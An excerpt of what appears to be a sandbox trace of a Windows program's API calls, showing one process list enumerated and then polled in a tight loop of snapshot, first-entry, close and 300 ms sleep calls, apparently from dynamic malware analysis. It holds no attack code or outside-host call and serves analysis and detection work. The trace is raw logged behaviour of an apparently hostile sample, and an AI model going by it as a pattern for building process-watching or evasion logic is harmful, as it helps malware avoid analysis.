Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0110.974] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0110.975] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0110.976] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0110.977] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0110.979] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0110.980] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0110.982] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0110.983] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0110.984] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0110.986] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0110.987] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0110.989] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0110.990] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.994] CloseHandle (hObject=0xbc) returned 1 [0110.994] Sleep (dwMilliseconds=0x12c) [0111.311] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0111.317] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.409] CloseHandle (hObject=0xc4) returned 1 [0111.409] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0111.414] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.492] CloseHandle (hObject=0xbc) returned 1 [0111.492] Sleep (dwMilliseconds=0x12c) [0111.807] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0111.812] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.908] CloseHandle (hObject=0xc4) returned 1 [0111.909] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0111.913] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.045] CloseHandle (hObject=0xbc) returned 1 [0112.045] Sleep (dwMilliseconds=0x12c) [0112.350] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0112.354] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.473] CloseHandle (hObject=0xc4) returned 1 [0112.473] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0112.477] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.669] CloseHandle (hObject=0xbc) returned 1 [0112.669] Sleep (dwMilliseconds=0x12c) [0112.992] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0112.997] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.053] CloseHandle (hObject=0xc4) returned 1 [0113.053] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0113.058] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.199] CloseHandle (hObject=0xbc) returned 1 [0113.199] Sleep (dwMilliseconds=0x12c) [0114.487] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0114.493] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0114.797] CloseHandle (hObject=0xc4) returned 1 [0114.797] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0114.802] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.059] CloseHandle (hObject=0xbc) returned 1 [0115.059] Sleep (dwMilliseconds=0x12c) [0115.411] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0115.417] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.539] CloseHandle (hObject=0xc4) returned 1 [0115.539] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0115.545] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.646] CloseHandle (hObject=0xbc) returned 1 [0115.647] Sleep (dwMilliseconds=0x12c) [0116.120] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0116.124] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.273] CloseHandle (hObject=0xc4) returned 1 [0116.273] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0116.279] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.333] CloseHandle (hObject=0xbc) returned 1 [0116.333] Sleep (dwMilliseconds=0x12c) [0116.734] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0116.740] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.855] CloseHandle (hObject=0xc4) returned 1 [0116.855] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0116.861] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.932] CloseHandle (hObject=0xbc) returned 1 [0116.932] Sleep (dwMilliseconds=0x12c) [0117.260] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0117.264] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.360] CloseHandle (hObject=0xc4) returned 1 [0117.360] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0117.366] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.517] CloseHandle (hObject=0xbc) returned 1 [0117.518] Sleep (dwMilliseconds=0x12c) [0118.068] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0118.074] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.329] CloseHandle (hObject=0xc4) returned 1 [0118.329] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0118.477] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.621] CloseHandle (hObject=0xbc) returned 1 [0118.621] Sleep (dwMilliseconds=0x12c) [0119.093] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0119.100] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.192] CloseHandle (hObject=0xc4) returned 1 [0119.192] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0119.208] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.281] CloseHandle (hObject=0xbc) returned 1 [0119.281] Sleep (dwMilliseconds=0x12c) [0119.642] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0119.649] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.744] CloseHandle (hObject=0xc4) returned 1 [0119.744] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0119.751] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.812] CloseHandle (hObject=0xbc) returned 1 [0119.812] Sleep (dwMilliseconds=0x12c) [0120.141] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0120.147] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.865] CloseHandle (hObject=0xc4) returned 1 [0120.865] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0120.871] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0121.296] CloseHandle (hObject=0xbc) returned 1 [0121.296] Sleep (dwMilliseconds=0x12c) [0124.828] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0124.833] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.112] CloseHandle (hObject=0xc4) returned 1 [0125.112] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0125.117] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.711] CloseHandle (hObject=0xbc) returned 1 [0125.712] Sleep (dwMilliseconds=0x12c) [0126.726] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0126.732] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.825] CloseHandle (hObject=0xc4) returned 1 [0126.825] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0126.831] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.990] CloseHandle (hObject=0xbc) returned 1 [0126.990] Sleep (dwMilliseconds=0x12c) [0127.331] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0127.336] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.454] CloseHandle (hObject=0xc4) returned 1 [0127.454] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0127.460] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.541] CloseHandle (hObject=0xbc) returned 1 [0127.541] Sleep (dwMilliseconds=0x12c) [0127.941] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0127.946] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.070] CloseHandle (hObject=0xc4) returned 1 [0128.070] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0128.075] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.202] CloseHandle (hObject=0xbc) returned 1 [0128.202] Sleep (dwMilliseconds=0x12c) [0128.518] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0128.524] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.622] CloseHandle (hObject=0xc4) returned 1 [0128.622] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0128.627] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.717] CloseHandle (hObject=0xbc) returned 1 [0128.717] Sleep (dwMilliseconds=0x12c) [0129.034] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0129.040] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.133] CloseHandle (hObject=0xc4) returned 1 [0129.133] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0129.137] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.254] CloseHandle (hObject=0xbc) returned 1 [0129.254] Sleep (dwMilliseconds=0x12c) [0129.581] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0129.586] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.708] CloseHandle (hObject=0xc4) returned 1 [0129.708] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0129.713] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.800] CloseHandle (hObject=0xbc) returned 1 [0129.800] Sleep (dwMilliseconds=0x12c) [0130.120] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0130.125] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.211] CloseHandle (hObject=0xc4) returned 1 [0130.211] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0130.215] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.332] CloseHandle (hObject=0xbc) returned 1 [0130.332] Sleep (dwMilliseconds=0x12c) [0130.740] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0130.745] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.848] CloseHandle (hObject=0xc4) returned 1 [0130.848] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0130.854] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.983] CloseHandle (hObject=0xbc) returned 1 [0130.983] Sleep (dwMilliseconds=0x12c) [0131.328] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0131.334] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0131.453] CloseHandle (hObject=0xc4) returned 1 [0131.453] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0131.459] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0131.563] CloseHandle (hObject=0xbc) returned 1 [0131.563] Sleep (dwMilliseconds=0x12c) [0131.962] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0131.967] Process32FirstW (in: 